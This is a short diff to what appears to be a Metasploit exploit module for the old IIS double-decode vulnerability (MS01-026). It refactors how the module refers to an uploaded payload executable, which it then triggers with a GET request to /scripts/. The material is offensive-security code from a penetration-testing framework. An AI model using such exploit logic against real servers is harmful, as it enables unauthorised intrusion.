diff --git a/modules/exploits/windows/iis/ms01_026_dbldecode.rb b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
index 7a930108a2..eab9230e60 100644
--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -196,12 +196,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Save these file names for later deletion
     @exe_cmd_copy = exe_fname
-    @exe_payload = payload_exe
+    @exe_payload = stager_instance.payload_exe
 
     # Just for good measure, we'll make a quick, direct request for the payload
     # Using the "start" method doesn't seem to make iis very happy :(
     print_status("Triggering the payload via a direct request...")
-    mini_http_request({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1)
+    mini_http_request({ 'uri' => '/scripts/' + stager_instance.payload_exe, 'method' => 'GET' }, 1)
 
     handler